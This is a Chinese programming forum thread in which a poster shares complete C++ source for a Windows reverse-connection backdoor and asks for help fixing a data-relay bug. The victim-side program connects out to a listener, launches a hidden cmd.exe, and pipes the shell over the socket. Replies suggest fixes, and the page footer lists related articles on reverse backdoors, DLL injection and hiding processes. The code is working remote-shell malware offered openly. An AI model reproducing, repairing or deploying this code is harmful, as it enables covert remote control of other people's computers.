多线程双管道反向连接后门

maoxing63570 2010-10-31 01:45:02 


//这个是我的服务端的代码

#include "TelnetServer.h"

#include <iostream>

using namespace std;

bool Exit=false;



HANDLE hMutex;

int SendData(

			 SOCKET *s,

			 const char* buf,

			 DWORD dwReadLen

			 )

{

	if(*s==INVALID_SOCKET||!buf)

	{

		return -1;

	}

	int Bytes_Send=0;

	int offset=0;

	do

	{

		Bytes_Send=send(*s,buf+offset,dwReadLen,0);

		if(Bytes_Send<=0)

			break;

		dwReadLen-=Bytes_Send;

		offset+=Bytes_Send;

	}while(dwReadLen>0);

	return 0;

}





DWORD WINAPI OutputThreadProc(LPVOID lpParameter)

{

	char recvbuff[RECV_DATA];

	memset(recvbuff,'\0',RECV_DATA);

	CThreadNode *node=(CThreadNode *)lpParameter;

	DWORD dwTotalBytes,dwReadLen;

	BOOL ret;

	while(!Exit)

	{

		ret=PeekNamedPipe(node->hRead,recvbuff,sizeof(recvbuff),&dwTotalBytes,NULL,NULL);

		if(ret&&dwTotalBytes>0)

		{

			ret=ReadFile(node->hRead,recvbuff,sizeof(recvbuff),&dwReadLen,NULL);

			if(ret&&dwReadLen>0)

			{

				SendData(&node->Server,recvbuff,dwReadLen);

			}

		}

		Sleep(6000);

	}

	return TRUE;

}



DWORD WINAPI InputThreadProc(LPVOID lpParameter)

{

	CThreadNode *node=(CThreadNode *)lpParameter;

	DWORD dwWrited=0,dwReceived=0;

	char buff[MAX_PATH]={0};

	BOOL bRet=false;

	while(TRUE)

	{

		

		dwReceived=recv(node->Server,buff,sizeof(buff),0);

		if(dwReceived>0&&dwReceived!=SOCKET_ERROR)

		{

			WriteFile(node->hWrite,buff,sizeof(buff),&dwWrited,NULL);

		}

		else

		{

			closesocket(node->Server);

			WriteFile(node->hWrite,"exit\r\n",sizeof("exit\r\n"),NULL,NULL);

			Exit=TRUE;

			break;

		}

		Sleep(6000);

	}

	return TRUE;

}

bool InitSocket()

{

	WORD wVersionRequested;

	WSADATA wsaData;

	int err;

	wVersionRequested=MAKEWORD(2,2);

	err=WSAStartup(wVersionRequested,&wsaData);

	if(err!=0)

	{

		cout<<"Could not find a usage WinSock DLL"<<endl;

		return false;

	}

	if(LOBYTE(wsaData.wVersion)!=2||HIBYTE(wsaData.wVersion)!=2)

	{

		cout<<"Could not find a usage WinSock DLL"<<endl;

		WSACleanup();

		return false;

	}

	return true;

}

void StartShell()

{

	if(!InitSocket())

		return;

	CThreadNode Sock;

	Sock.Server=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

	SOCKADDR_IN ServerAddr;

	ServerAddr.sin_addr.S_un.S_addr=inet_addr("127.0.0.1");

	ServerAddr.sin_family=AF_INET;

	ServerAddr.sin_port=htons(8000);

	if(SOCKET_ERROR==connect(Sock.Server,(sockaddr *)&ServerAddr,sizeof(SOCKADDR_IN)))

	{

		cout<<"Connect with error"<<GetLastError()<<endl;

		WSACleanup();

		return;

	}

	HANDLE hRead1=NULL,hWrite1=NULL;

	HANDLE hRead2=NULL,hWrite2=NULL;

	SECURITY_ATTRIBUTES SecurityAttrib;

	SecurityAttrib.bInheritHandle=true;

	SecurityAttrib.lpSecurityDescriptor=NULL;

	SecurityAttrib.nLength=sizeof(SECURITY_ATTRIBUTES);

	

	if(!CreatePipe(&hRead1,&hWrite1,&SecurityAttrib,0))

	{

		cout<<"Create pipe failed"<<GetLastError()<<endl;

		return;

	}

	

	if(!CreatePipe(&hRead2,&hWrite2,&SecurityAttrib,0))

	{

		cout<<"Create pipe failed"<<GetLastError()<<endl;

		return;

	}

	

	char Path[50];

	GetSystemDirectory(Path,50);

	strcat(Path,"\\cmd.exe");

	PROCESS_INFORMATION ProcessInfo={0};

	STARTUPINFO StartInfo;

	ZeroMemory(&StartInfo,sizeof(StartInfo));

	StartInfo.cb=sizeof(STARTUPINFO);

	StartInfo.dwFlags=STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;

	StartInfo.hStdInput=hRead1;

	StartInfo.hStdOutput=hWrite2;

	StartInfo.hStdError=GetStdHandle(STD_ERROR_HANDLE);

	StartInfo.wShowWindow=SW_HIDE;

	

	if(!CreateProcess(Path,NULL,NULL,NULL,TRUE,0,NULL,NULL,&StartInfo,&ProcessInfo))

	{

		cout<<"Create process failed"<<GetLastError()<<endl;

		return;

	}

	

	Sock.hRead=hRead2;

	Sock.hWrite=hWrite1;

	HANDLE Output=CreateThread(NULL,NULL,OutputThreadProc,&Sock,0,NULL);

	HANDLE Input=CreateThread(NULL,NULL,InputThreadProc,&Sock,0,NULL);

	HANDLE handle[]={Output,Input};

	WaitForMultipleObjects(2,handle,TRUE,INFINITE);

	return;

	}

int WINAPI WinMain(          

				   HINSTANCE hInstance,

				   HINSTANCE hPrevInstance,

				   LPSTR lpCmdLine,

				   int nCmdShow

				   )

				   

{	StartShell();	

         return 0;

}

上面是我的服务端的代码(也就是被控端)
下面是TelnetServer.h的代码


#include <windows.h>

#pragma comment(lib,"ws2_32.lib")

#define RECV_DATA 5120

class CThreadNode

{

public:

	SOCKET Server;

	HANDLE hRead;

	HANDLE hWrite;

	CThreadNode()

	{

		Server=INVALID_SOCKET;

		hRead=hWrite=NULL;

	}

};

下面是我的客户端的代码


// TelnetClient.cpp : Defines the entry point for the console application.

//



#include "stdafx.h"

#include <windows.h>

#include <iostream>

#pragma comment(lib,"ws2_32.lib")

using namespace std;



bool InitSocket()

{

	WORD wVersionRequested;

	WSADATA wsaData;

	int err;

	wVersionRequested=MAKEWORD(2,2);

	err=WSAStartup(wVersionRequested,&wsaData);

	if(err!=0)

	{

		cout<<"Could not find a usage WinSock DLL"<<endl;

		return false;

	}

	if(LOBYTE(wsaData.wVersion)!=2||HIBYTE(wsaData.wVersion)!=2)

	{

		cout<<"Could not find a usage WinSock DLL"<<endl;

		WSACleanup();

		return false;

	}

	return true;

}



void BuildSocket()

{

	if(!InitSocket())

		return;



	SOCKET Server;

	SOCKET Client;

	SOCKET AcceptSock;

	SOCKADDR_IN ServerAddr;

	SOCKADDR_IN ClientAddr;

	int size=sizeof(SOCKADDR_IN);

	Client=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

	ClientAddr.sin_addr.S_un.S_addr=htonl(INADDR_ANY);

	ClientAddr.sin_family=AF_INET;

	ClientAddr.sin_port=htons(8000);



	if(bind(Client,(sockaddr *)&ClientAddr,sizeof(SOCKADDR_IN))==SOCKET_ERROR)

	{

		cout<<"Bind socket with error"<<GetLastError()<<endl;

		WSACleanup();

		return;

	}



	if(listen(Client,5)==SOCKET_ERROR)

	{

		cout<<"Listen socket with error"<<GetLastError()<<endl;

		WSACleanup();

		return;

	}



	char recvbuff[4096];

	char sendbuff[512];

	memset(recvbuff,0,4096);//如果这里不注释起来,客户端就接收不到数据,如果注释起来,就会出现客户端接受到的数据后面会出现乱码

	memset(sendbuff,0,512);//跟上面是一样的

	AcceptSock=accept(Client,(sockaddr *)&ServerAddr,&size);

	while(true)

	{

		if(AcceptSock==INVALID_SOCKET)

			return;

		gets(sendbuff);

		cin.clear();

		if(send(AcceptSock,sendbuff,sizeof(sendbuff),0)==SOCKET_ERROR)

		{

			cout<<"Send data with error"<<GetLastError()<<endl;

			WSACleanup();

			return;

		}

		if(recv(AcceptSock,recvbuff,sizeof(recvbuff),0)==SOCKET_ERROR)

		{

			cout<<"Revceive data with error"<<GetLastError()<<endl;

			WSACleanup();

			return;

		}

		cout<<recvbuff;

		

	}



	closesocket(AcceptSock);

	closesocket(Client);

	WSACleanup();

	return;

}

int _tmain(int argc, _TCHAR* argv[])

{

	BuildSocket();

	return 0;

}

服务端的代码出现在多线程那部分,调试了一天也没有找到规律,请大家帮我看下。
...全文
240 9 打赏 收藏 转发到动态 举报
写回复
用AI写文章
9 条回复
切换为时间正序
请发表友善的回复…
发表回复
maoxing63570 2010-11-07
  • 打赏
  • 举报
 回复 


DWORD WINAPI OutputThreadProc(LPVOID lpParameter)

{

    char recvbuff[RECV_DATA];

    memset(recvbuff,'\0',RECV_DATA);

    CThreadNode *node=(CThreadNode *)lpParameter;

    DWORD dwTotalBytes,dwReadLen;

    BOOL ret;

    while(!Exit)

    {

        dwTotalBytes//就是这么一小句语句决定了这件艺术品的成败        

        ret=PeekNamedPipe(node->hRead,recvbuff,sizeof(recvbuff),&dwTotalBytes,NULL,NULL);

        if(ret&&dwTotalBytes>0)

        {

            ret=ReadFile(node->hRead,recvbuff,sizeof(recvbuff),&dwReadLen,NULL);

            if(ret&&dwReadLen>0)

            {

                SendData(&node->Server,recvbuff,dwReadLen);

            }

        }

        Sleep(6000);

    }

    return TRUE;

}
xili 2010-11-05
  • 打赏
  • 举报
 回复
呵呵,黑客教程啊
csx007700 2010-11-04
  • 打赏
  • 举报
 回复
同意楼上 mark

不过没看出哪里有问题额。

可以考虑recv的时候保存一下接收大小,接收完了以后在后面加一个\0
job82824 2010-11-03
  • 打赏
  • 举报
 回复
代码不错,mark一下。
char recvbuff[4096];改成BYTE recvbuff[4096];
maoxing63570 2010-11-02
  • 打赏
  • 举报
 回复
[Quote=引用 4 楼 jianghandaxue 的回复:]
写反了吧,上面客户端,下面服务器端
[/Quote]
你懂不懂什么是反弹连接?
jianghandaxue 2010-11-02
  • 打赏
  • 举报
 回复
写反了吧,上面客户端,下面服务器端
visualwind 2010-11-01
  • 打赏
  • 举报
 回复
send(AcceptSock,sendbuff,sizeof(sendbuff),0)改为
send(AcceptSock,sendbuff,strlen(sendbuff),0)
最好先检查一下strlen(sendbuff)的值是多少
maoxing63570 2010-10-31
  • 打赏
  • 举报
 回复
[Quote=引用 1 楼 csx007700 的回复:]
具体是什么Bug?可以说清楚些吗?
[/Quote]
个人觉得已经说的很清楚了,编译没有错误,运行的时候如我上面所说的
csx007700 2010-10-31
  • 打赏
  • 举报
 回复
具体是什么Bug?可以说清楚些吗?
如何基于Python写一个TCP反向连接后门
0x0 介绍 在Linux系统做未授权测试,我们须准备一个安全的渗透环境,通常第一件事就是安装虚拟机。且在攻击阶段中还需要对受害系统进行控制。常见的后门大多数是利用Metasploit生成,而目前反病毒产品遇到Metasploit文件签名的程序就会添加特征库作为查杀对象,所以开发出自己的后门程序非常必要。 这篇文章将介绍如何写一个具有反向连接功能的后门反向连接:通常的网络连接程序是由客户
【Python】如何基于Python写一个TCP反向连接后门
首发安全客 如何基于Python写一个TCP反向连接后门 https://www.anquanke.com/post/id/92401 0x0 介绍   在Linux系统做未授权测试,我们须准备一个安全的渗透环境,通常第一件事就是安装虚拟机。且在攻击阶段中还需要对受害系统进行控制。常见的后门大多数是利用Metasploit生成,而目前反病毒产品遇到Metasploit文件签名的程序就会添...
Windows下管道后门反向shell编写与总结(C++)
1. 双管道被动连接后门 #define _CRT_SECURE_NO_WARNINGS #define _WINSOCK_DEPRECATED_NO_WARNINGS #include <WinSock2.h> #include <iostream> #include <windows.h> #include <cstdlib> #include <iostream> #include <urlmon.h> #include &
安全之路 —— 借助DLL进行远程线程注入实现穿墙与隐藏进程
简介 大多数后门或病毒要想初步实现隐藏进程,即不被像任务管理器这样典型的RING3级进程管理器找到过于明显的不明进程,其中比较著名的方法就是通过远程线程注入的方法注入将恶意进程的DLL文件注入系统认可的正常进程,你会发现任务管理器以及找不到独立出现的恶意进程项了。反向连接后门采用这种技术,注入防火墙认可的进程(例如大部分系统进程,像explorer.exe就很常见)还能...
让所有正向程序实现反向连接【转载】
秘密穿过内网防火墙作者:陈一天  查看:19  平均分:0  日期:2005-6-3  类别:网络通信     小天最近利用微软新爆出的几个漏洞,放出很多C/S木马,但捕获的“肉鸡”却是少之又少,让他郁闷不已。原来,很多中招者都是FTTP+LAN环境下的局域网用户,在小天与被攻击者之间隔有硬件防火墙,而采用IP直连的方法当然是行不通的。此时,他想到了一位法力无边的“天使”Angelshell…… 
进程/线程/DLL

15,471

社区成员

49,181

社区内容

发帖
与我相关
我的任务
社区描述
VC/MFC 进程/线程/DLL
社区管理员
  • 进程/线程/DLL社区
加入社区
  • 近7日
  • 近30日
  • 至今

加载中

查看更多榜单
社区公告
暂无公告

试试用AI创作助手写篇文章吧

+ 用AI写文章